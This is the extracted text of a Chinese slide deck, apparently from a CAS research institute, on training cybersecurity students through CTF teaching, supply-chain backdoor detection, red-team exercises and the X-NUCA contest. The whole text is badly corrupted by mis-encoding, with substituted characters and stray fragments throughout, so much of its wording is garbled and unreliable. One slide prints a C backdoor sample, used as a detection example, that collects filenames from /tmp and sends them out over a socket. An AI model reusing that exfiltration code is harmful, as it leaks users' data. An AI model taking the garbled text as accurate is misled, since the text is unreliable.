攻防兼?zhèn)涞膶?shí)戰(zhàn)型網(wǎng)絡(luò)安全人才培養(yǎng)實(shí)踐

1、攻防兼?zhèn)涞膶?shí)戰(zhàn)型網(wǎng)絡(luò)安全人才培養(yǎng)實(shí)踐技術(shù)創(chuàng)新，變革未來(lái)目錄培養(yǎng)模式授課方法科研思路 實(shí)戰(zhàn)演練中國(guó)科學(xué)院研究生兩段式培養(yǎng)模式中國(guó)科學(xué)院大學(xué)（簡(jiǎn)稱(chēng)“國(guó)科大”）與中國(guó)科學(xué)院各研究所在管理體制、師資隊(duì)伍、培養(yǎng)體系、科研工作等方面“共有、共治、共享、共發(fā)展”，實(shí)現(xiàn)高度融合。通過(guò)科教融合， 匯聚中科院優(yōu)質(zhì)資源，適當(dāng)引入外部資源，為學(xué)生提供最好的教育資源。力爭(zhēng)使研究生在一年的集中學(xué)習(xí)環(huán)節(jié)中把所涉及 的知識(shí)學(xué)深、學(xué)扎實(shí)，為后幾年進(jìn)入研究階段的 學(xué)習(xí)打好基礎(chǔ)。第一階段校園集中授課以課程建設(shè)為抓手第二年回到各研究所，進(jìn)入課題組，邊進(jìn)行科研 實(shí)踐，邊進(jìn)行學(xué)科專(zhuān)業(yè)課和特色課程的學(xué)習(xí)，在 導(dǎo)師的指導(dǎo)下完成研究生的科研論

2、文。第二階段研究所科研學(xué)習(xí)與科研實(shí)踐相結(jié)合深度科教融合核心使命：培養(yǎng)造就高質(zhì)量創(chuàng)新創(chuàng)業(yè)人才！高質(zhì)量創(chuàng)新創(chuàng)業(yè)人才的評(píng)價(jià)要素是什么？理論知識(shí)實(shí)踐能力創(chuàng)新思維創(chuàng)業(yè)能動(dòng)性目錄培養(yǎng)模式授課方法科研思路 實(shí)戰(zhàn)演練第一階段校園集中授課學(xué)習(xí)資料多攻防技術(shù)發(fā)展迅速， 大量論文、書(shū)籍、 帖子、報(bào)告、在線 站點(diǎn)、開(kāi)源項(xiàng)目安全資訊多網(wǎng)絡(luò)安全事件頻發(fā) 微信群安全簡(jiǎn)訊 朋友圈轉(zhuǎn)發(fā)文章 互聯(lián)網(wǎng)新媒體CTF賽事多校賽/ 省賽/ 國(guó)賽 高校主辦/ 校企合 辦/ 企業(yè)獨(dú)立組織引導(dǎo)競(jìng)賽觀？課程怎么教？如何劃重點(diǎn)？多參賽就好？上課學(xué)什么？哪些值得看？老師 視角學(xué)生 視角授課方法知識(shí)鏈牽引工具產(chǎn)品了解國(guó)內(nèi)外工業(yè)界情況事件案例加強(qiáng)代入感

3、讓知識(shí)可見(jiàn)學(xué)術(shù)成果緊跟國(guó)內(nèi)外學(xué)術(shù)界進(jìn)展理論 體系理論 體系保證知識(shí)的系統(tǒng)性攻防實(shí)踐加深對(duì)課堂講授內(nèi)容的理解授課方法：以Web安全技術(shù)為例攻防實(shí)踐在攻防實(shí)踐方面，把CTF比賽引入授課過(guò)程中，針對(duì)授課內(nèi)容知識(shí)點(diǎn)設(shè)計(jì)題目，成績(jī)納入期末總成績(jī)。采用“單人組隊(duì)比賽、課堂集中解題、隨時(shí)隨意討論“的形式，確保每一位學(xué)生都能體驗(yàn)基于CTF的攻防實(shí)踐過(guò)程，進(jìn)而加深每一個(gè)人對(duì)課堂講授內(nèi)容的理解，建立Web安全形象思維和安全意識(shí)。目錄培養(yǎng)模式授課方法科研思路 實(shí)戰(zhàn)演練第二階段研究所科研【立足業(yè)界需求】在“理論體系-學(xué)術(shù)成 果-工具產(chǎn)品-事件案例-攻防實(shí)踐”知識(shí) 鏈條牽引下，立足業(yè)界需求，依托研究所 科研項(xiàng)目，聚焦興

4、趣點(diǎn)?！咎釤捒茖W(xué)問(wèn)題】充分調(diào)研國(guó)內(nèi)外學(xué)術(shù)界、 工業(yè)界研究現(xiàn)狀，自主提出關(guān)鍵科學(xué)問(wèn)題，并開(kāi)展系統(tǒng)深入的研究?！菊鎸?shí)場(chǎng)景驗(yàn)證】研發(fā)原型系統(tǒng)，在真實(shí) 環(huán)境下部署，測(cè)試功能和性能。研究方向業(yè)界 需求科研 項(xiàng)目興趣 愛(ài)好如何有益于解決真實(shí)業(yè)務(wù)場(chǎng)景問(wèn)題？如何開(kāi)展科研實(shí)踐？網(wǎng)絡(luò)安全的本質(zhì)在對(duì)抗，對(duì)抗的本質(zhì)在攻防兩端能力的較量。要以技術(shù)對(duì)技術(shù)，以技術(shù)管技術(shù)，做到魔高一尺、道高一丈?！竟?jié)選自419講話】從攻擊者視角分析問(wèn)題，以防御者視角解決問(wèn)題，用實(shí)戰(zhàn)演練檢驗(yàn)效果。攻防角色互換科研思路：以軟件供應(yīng)鏈安全為例近些年，從XcodeGhost事件，到Xshell后門(mén)、python pip源欺騙性污染釣魚(yú)。軟件供應(yīng)鏈

5、安全事件頻發(fā)，且具有威脅對(duì)象種類(lèi)多、極端隱蔽、攻擊成本低回報(bào)高、檢測(cè)困難等特性。軟件供應(yīng)鏈?zhǔn)侵赣绍浖_(kāi)發(fā)環(huán)節(jié)，交付環(huán)節(jié)和使用環(huán)節(jié)組成的功能鏈。而軟件供應(yīng)鏈污染則 是在軟件供應(yīng)鏈中的各個(gè)環(huán)節(jié)中，利用不同的技術(shù)對(duì)軟件進(jìn)行污染。源代碼內(nèi)部組件外部組件執(zhí)行邏輯應(yīng)用程序 開(kāi)發(fā)交付使用需求設(shè)計(jì)下載分發(fā)安裝運(yùn)行升級(jí)編寫(xiě)編譯生成軟件供應(yīng)鏈安全威脅模型圖2018年軟件供應(yīng)鏈安全大賽“C源碼專(zhuān)題賽”分站賽第一名2018功守道阿里軟件供應(yīng)鏈安全大賽，是聚焦軟件供應(yīng)鏈安全范疇內(nèi)泛化的攻擊面與應(yīng)對(duì)技 術(shù)、策略，面向業(yè)界、學(xué)術(shù)領(lǐng)域，采用對(duì)抗為主的全新挑戰(zhàn)賽形式。中科院信工所團(tuán)隊(duì)作為防守方從防御的角度檢測(cè)題目中是否存在軟件

6、供應(yīng)鏈安全風(fēng)險(xiǎn)點(diǎn)。在C源碼專(zhuān)題賽分站賽3的183個(gè)待檢測(cè)樣本中，發(fā)現(xiàn)惡意后門(mén)數(shù)量81個(gè)，正確解題數(shù)量115道。獲得C源碼專(zhuān)題賽分站賽第一名，并直接晉級(jí)總決賽。2018年軟件供應(yīng)鏈安全大賽“C源碼專(zhuān)題賽”比賽過(guò)程惡意行為分類(lèi)建?？偨Y(jié)幾十種模型： 敏感函數(shù)集合+上下文約束關(guān)系單點(diǎn)惡意行為：系統(tǒng)敏感信息采集等；二階段惡意行為：用 戶(hù)操作歷史的讀取和 無(wú)校驗(yàn)網(wǎng)絡(luò)傳出；復(fù)合惡意行為：鍵盤(pán) hook等。C源碼樣本下載183個(gè)待檢測(cè) C源碼樣本比賽3小時(shí)，提交結(jié)果5次，發(fā)現(xiàn)惡意后門(mén)數(shù)量81個(gè)，正確解題115道。污點(diǎn)分析模型匹配基于LLVM pass框架的 中間代碼表示，進(jìn)而檢 測(cè)惡意行為C源碼中間代碼表示；

7、污點(diǎn)分析：發(fā)現(xiàn)疑似敏感行為；模型匹配：I/O操作網(wǎng)絡(luò)傳出。誤報(bào)過(guò)濾結(jié)果提交實(shí)現(xiàn)C源碼惡意后門(mén)自 動(dòng)化檢測(cè)系統(tǒng)基于路徑可達(dá)性分析 的誤報(bào)過(guò)濾。2018年軟件供應(yīng)鏈安全大賽“C源碼專(zhuān)題賽”解題舉例int s; char buff1024; DIR *dir_path;struct sockaddr_in sockaddin; struct dirent *path; memset(buff, 0, sizeof(buff);dir_path = opendir(/tmp);if (dir_path) while (path = readdir(dir_path) != NULL) sprintf(

8、buff, %sn%s, buff, path-d_name);closedir(dir_path);if (s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) 0) goto Exit;memset(&sockaddin, 0, sizeof(sockaddin);if (connect(s,(struct sockaddr *) &sockaddin, sizeof(sockaddin) 0) goto Exit;send(s, buff, sizeof(buff), 0);close(s); Exit;污染源收集“/tmp” 目錄下，所有 文件的文

9、件名無(wú)校驗(yàn)網(wǎng)絡(luò)輸出污點(diǎn)分析：發(fā)現(xiàn)污點(diǎn)數(shù)據(jù)流向 send函數(shù)（敏感操作），疑似 敏感行為，進(jìn)行深度檢測(cè)分析；模型匹配：I/O操作網(wǎng)絡(luò)傳出，進(jìn)行敏感行為模型匹配，發(fā)現(xiàn) 執(zhí)行時(shí)可觸發(fā)敏感行為，進(jìn)行 觸發(fā)點(diǎn)定位。知識(shí)鏈牽引+攻防角色互換形成基于“理論體系-學(xué)術(shù)成果-工具 產(chǎn)品-事件案例-攻防實(shí)踐”知識(shí)鏈牽引的授課思路，以及“從攻擊者視角 分析問(wèn)題，以防御者視角解決問(wèn)題，用實(shí)戰(zhàn)演練檢驗(yàn)效果”攻防角色互換 的科研思路。攻防兼?zhèn)涞膶?shí)戰(zhàn)型網(wǎng)安人才培養(yǎng)實(shí)踐目錄培養(yǎng)模式授課方法科研思路 實(shí)戰(zhàn)演練2017貴陽(yáng)大數(shù)據(jù)及網(wǎng)絡(luò)安全攻防演練“安全成果一等獎(jiǎng)”2017貴陽(yáng)大數(shù)據(jù)及網(wǎng)絡(luò)安全攻防演練，是在真實(shí)網(wǎng)絡(luò)環(huán)境中，針對(duì)真實(shí)

10、目標(biāo)的滲透測(cè)試演練。中科院信工所評(píng)測(cè)團(tuán)隊(duì)，針對(duì)相關(guān)目標(biāo)發(fā)現(xiàn)并提交重要漏洞50多個(gè)，率先攻破多個(gè)重點(diǎn)或核 心目標(biāo)，控制重點(diǎn)及核心目標(biāo)關(guān)鍵服務(wù)器近30臺(tái)，突破五家單位系統(tǒng)的內(nèi)網(wǎng)并控制大量?jī)?nèi)網(wǎng) 主機(jī)，包括工控領(lǐng)域系統(tǒng)。榮獲最高獎(jiǎng)項(xiàng)“安全成果一等獎(jiǎng)”。2017貴陽(yáng)大數(shù)據(jù)及網(wǎng)絡(luò)安全攻防演練“安全成果一等獎(jiǎng)”系統(tǒng)突破明確漏洞造成的 影響，進(jìn)一步的 提權(quán)、內(nèi)網(wǎng)滲透漏洞利用漏洞掃描、漏 洞挖掘與利用、 手工滲透測(cè)試信息搜集偵查域名、子域 名、開(kāi)放端口， 識(shí)別系統(tǒng)信息明確目標(biāo)17個(gè)真實(shí)目標(biāo)，含4個(gè)核心目標(biāo)、8個(gè)重點(diǎn)目標(biāo)*工控系統(tǒng)企事業(yè)單位*大數(shù)據(jù)平臺(tái)8天12小時(shí)，5人，提交漏洞50多個(gè)，控制關(guān)鍵服務(wù)器近30臺(tái)，

11、突破并控制五家單位系統(tǒng)的內(nèi)網(wǎng)主機(jī)。形成報(bào)告總結(jié)漏洞成因、利用方法、防御手段，形成報(bào)告全國(guó)高校網(wǎng)安聯(lián)賽（X-NUCA）中國(guó)科學(xué)院深圳市人民政府中國(guó)網(wǎng)絡(luò)空間安全協(xié)會(huì)指導(dǎo) 單位中國(guó)科學(xué)院大學(xué)網(wǎng)絡(luò)空間安全學(xué)院 湖南合天智匯信息技術(shù)有限公司 北京永信至誠(chéng)科技股份有限公司承辦 單位中國(guó)科學(xué)院信息工程研究所 深圳市科技創(chuàng)新委員會(huì)主辦 單位深圳市南山區(qū)人民政府 360企業(yè)安全集團(tuán)深圳大學(xué)協(xié)辦 單位中國(guó)科學(xué)院信息工程研究所于2016年創(chuàng)辦的“全國(guó)高校網(wǎng)安聯(lián)賽(National University CybersecurityAssociation，簡(jiǎn)稱(chēng)X-NUCA)”，是面向全國(guó)高校學(xué)生的網(wǎng)絡(luò)安全技能賽，推出“

12、競(jìng)賽+”模式，大賽 秉承“寓學(xué)于賽，以賽促學(xué)”的理念，旨在更好地促進(jìn)網(wǎng)絡(luò)安全人才的培養(yǎng)和選拔。第二屆X-NUCA2017三期線上賽總決賽深圳第一屆X-NUCA2016五期線上賽總決賽北京2016全國(guó)高校網(wǎng)安聯(lián)賽（X-NUCA2016）第一屆全國(guó)高校網(wǎng)安聯(lián)賽(X-NUCA2016)比賽歷程2016年7月2016年12月總決賽線上解題模式+線下攻防模式存在問(wèn)題：重技巧、輕實(shí)戰(zhàn)，脫離真實(shí)網(wǎng)絡(luò)攻防場(chǎng)景2017全國(guó)高校網(wǎng)安聯(lián)賽（X-NUCA2017）12月19-22日年度總決賽Web安全靶場(chǎng)滲透專(zhuān)題賽8月26日10月8日Windows 7 靶場(chǎng)評(píng)測(cè)專(zhuān)題賽11月25日企業(yè)安全眾測(cè) 靶場(chǎng)挑戰(zhàn)賽第二屆全國(guó)高校

13、網(wǎng)安聯(lián)賽(X-NUCA2017)比賽歷程基于網(wǎng)絡(luò)靶場(chǎng)的網(wǎng)安聯(lián)賽X-NUCA2017利用網(wǎng)絡(luò)靶場(chǎng)技術(shù)，為參賽者提供接近于真實(shí)互聯(lián)網(wǎng)環(huán)境的網(wǎng)絡(luò)攻防對(duì)抗場(chǎng)景。如何設(shè)計(jì)接近于真實(shí)互聯(lián)網(wǎng)環(huán)境的網(wǎng)絡(luò)攻防場(chǎng)景？網(wǎng)絡(luò)區(qū)域設(shè)定劃分公網(wǎng)、內(nèi) 網(wǎng)、專(zhuān)網(wǎng)環(huán)境網(wǎng)絡(luò)場(chǎng)景選取源于真實(shí)互 聯(lián)網(wǎng)環(huán)境網(wǎng)絡(luò)拓?fù)涑橄蠖ㄎ魂P(guān)鍵網(wǎng) 絡(luò)節(jié)點(diǎn)攻防題目設(shè)計(jì)立足攻防實(shí)戰(zhàn) 經(jīng)驗(yàn)風(fēng)險(xiǎn)評(píng)估滲透測(cè)試應(yīng)急響應(yīng)樣本分析追蹤溯源以X-NUCA2017總決賽團(tuán)隊(duì)賽比賽環(huán)境為例網(wǎng)絡(luò)場(chǎng)景選取公網(wǎng)部分：與互聯(lián)網(wǎng)連接， 用于處理一般性事務(wù)，或?qū)?外的門(mén)戶(hù)網(wǎng)站。內(nèi)網(wǎng)部分：一般是單位內(nèi)部 局域網(wǎng)絡(luò)，用于日常辦公、 對(duì)公網(wǎng)區(qū)域管理等。此區(qū)域 內(nèi)可能會(huì)存儲(chǔ)業(yè)務(wù)系統(tǒng)中的 較敏感

14、信息。專(zhuān)網(wǎng)部分：一般用于與總部 交換核心數(shù)據(jù)或處理特殊業(yè) 務(wù)，屬于業(yè)務(wù)中核心的部分。以X-NUCA2017總決賽團(tuán)隊(duì)賽比賽環(huán)境為例網(wǎng)絡(luò)拓?fù)涑橄蟊荣愡x手網(wǎng)關(guān)服務(wù)器以X-NUCA2017總決賽團(tuán)隊(duì)賽比賽環(huán)境為例比賽選手網(wǎng)關(guān) 公網(wǎng) 內(nèi)網(wǎng) 專(zhuān)網(wǎng)服務(wù)器一個(gè) 公網(wǎng) 區(qū)域整個(gè)業(yè)務(wù)中接入公網(wǎng)的服務(wù)，節(jié)點(diǎn)包括門(mén)戶(hù)網(wǎng)站及數(shù)據(jù)庫(kù)等。選手可以直接訪問(wèn)到 公網(wǎng)服務(wù)，是整個(gè)環(huán)境的入口。三個(gè) 內(nèi)網(wǎng) 區(qū)域包括內(nèi)網(wǎng)服務(wù)器、網(wǎng)站管理員工作PC、 代碼倉(cāng)庫(kù)服務(wù)器等。3個(gè)內(nèi)網(wǎng)分別由3個(gè)公 網(wǎng)服務(wù)接入。一個(gè) 專(zhuān)網(wǎng) 區(qū)域核心業(yè)務(wù)區(qū)，包括Web服務(wù)器、業(yè)務(wù)應(yīng) 用服務(wù)器。所有專(zhuān)網(wǎng)的最內(nèi)層節(jié)點(diǎn)在此區(qū) 域連成一個(gè)大網(wǎng)。網(wǎng)絡(luò)區(qū)域設(shè)定以X-NUCA2017總決賽團(tuán)隊(duì)賽比賽環(huán)境為例Web CMS漏洞弱口令一個(gè)密碼多處使用不正確的網(wǎng)絡(luò)配置日志中的隱藏信息黑客攻擊痕跡跨網(wǎng)攻擊代理跳板比賽選手網(wǎng)關(guān) 公網(wǎng) 內(nèi)網(wǎng) 專(zhuān)網(wǎng)服務(wù)器攻防題目設(shè)計(jì)隱藏了多個(gè)關(guān)鍵信 息，這些信息是選 手內(nèi)網(wǎng)滲透路徑中 的必須信息部署AWD模式的競(jìng) 賽題目，在攻擊其 他隊(duì)伍的同時(shí)，需 要修復(fù)自己的漏洞以X-NUC